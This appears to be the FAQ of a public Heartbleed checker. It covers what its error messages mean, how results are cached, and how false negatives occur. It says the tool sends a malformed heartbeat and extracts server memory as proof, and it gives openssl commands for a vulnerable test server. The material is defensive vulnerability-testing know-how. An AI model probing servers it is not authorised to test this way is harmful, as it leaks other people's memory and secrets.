My Twitter feed might be a good place to look for known issues.
This error means that I can't tell if the server is vulnerable (probably not). This might be because:
broken pipe
, connection reset by peer
and timeout
errors are rising now, they are probably counter-measures, firewalls and IPS closing the connection or sink-holing it when they detect a heartbeat
broken pipe
is also caused by the unaffected IIS server
timeout
is apparently also caused by patched servers that don't respond to our "quit" message. This happens with a patched server, but is not a green since the same behavior might be caused by my servers being overloaded, so I can't be sure.
tls: oversized record received with length 20291
(and sometimes EOF
) means that the service uses STARTTLS and I still need to implement it. Use the command line tool meanwhile, with -service=ftp/imap/...
.
connection refused
)
timeout
then my servers are under too heavy load, probably
Here is it! by @mightyshakerjnr: Chromebleed.
And for Firefox: FoxBleed.
If you are getting consistent reds (3 or more in a row, if you see just one it MIGHT be a glitch) I'm 100% certain that the host you are passing me is vulnerable, and it is now. (Please note that I'm now caching results for 1 hour.)
Common causes include (got them from Twitter, mail or here)
openssl
and not libssl
mod_spdy
, it uses a backported OpenSSL
service sw-cp-server restart
Yes, for 1 hour. The cache key is service + host + Advanced checkbox. AWS DynamoDB in case you were wondering. Contributed initially by Mozilla.
No, there are no caches other than the one of your browser, and that should not be involved. Getting a red is simply a really quick process.
Yes, when you hit the button I actually go to the site, send them a malformed heartbeat and extract ~80 bytes of memory as proof, just like an attacker would. I don't check versions or make assumptions, I look for the bug.
There used to be a bug that under load caused timeouts to be interpreted as greens. This should not be the case anymore.
If it's still the case please contact me on Twitter specifying the hostname and time.
Be careful, unless you glitched the site hammering the button, there is no way I can think of a red is not a red.
Check the memory dump, if it's there then the tool got it from somewhere.
Let's say I'm 99% certain that you should look better if you restarted all processes after updating correctly.
Update: still, I'm getting consistently reports of unaffected versions going red for one, maybe two time(s) maximum, if it happens repeatedly the site IS vulnerable.
Please come comment to the issue if you are affected. I'm looking for 3 things: memory dumps (to figure out where they came from), timestamps (as accurate as possible, try with the Network tab), a complete description of what you clicked and typed.
Yes and yes, get yourself a copy of Go 1.2 and head to GitHub.
I don't think this would be responsible. People are trusting me with bits of their infrastructure information, and I think many trust me not to disclose them. My plea is to release only anonymous aggregated information - for sites outside the Alexa top 1000 (because hey, I'm going to tell you if one of them took 24 hours to patch).
People are right wanting to know if a compromise happened for a site they use, and I'm trying to figure out how to responsibly meet this need. If you have opinions on this please ping me on Twitter.
I'm not gonna tell you how to extract more memory or what to do with it, sorry.
That's true. Unfortunately, there is no real way to check if a certificate has been re-keyed without comparing it to the previous one (a certificate can be re-keyed without dates being updated, and many CAs are doing this). The ZMap people did that the right way.
Moreover, the security risk of a patched server with a old cert is way lower, an attacker would need to be intercepting your traffic to take advantage of this. So I feel that the priority now is getting users to change passwords that might have been leaked to the world, not to a really skilled roommate, their malicious ISP or the NSA (these 3 being the few that can probably MiTM you).
It's site owners responsibility to tell users what was done to handle the issue and to tell them when to change their password. Also, site owners: please invalidate all users passwords and ask for them to be reset via email on first login, it's the responsible thing to do.
Be my guest:
ec2-54-81-196-192.compute-1.amazonaws.com:4433
. Don't be evil ;)
So you guys knocked down this too. I'll publish an AMI, meanwhile this will open up port 4433 (make sure to have a vulnerable openssl, latest Ubuntu EC2 is fine)
openssl req -x509 -nodes -days 365 -newkey rsa:1024 -keyout mycert.pem -out mycert.pem openssl s_server -cert mycert.pem -www
By the way, I use cloudflarechallenge.com
for testing.
This is a completely safe test, and will do nothing to your systems if you have patched. Please patch.
Here is a list of the machine hosts and IPs. Please don't file Abuse reports, okay? <3
Oh snap, contact me on on Twitter or open an issue on GitHub.
If you are reporting a bug or some unsupported service, please provide hostnames, memory dumps, exact errors...
Load issues (probably) caused many connections to the tested servers to fail randomly and report a FALSE NEGATIVE (green).
Repeated tests will finally yield a red. The red result takes precedence over all the others and is certain. You are given a sample of live server memory as proof.
I'm very sorry about this happening. I'm spinning up more machines for a quick fix, and then rewriting the test to give only positive green.
Meanwhile you can use the command line tool that is completely unaffected.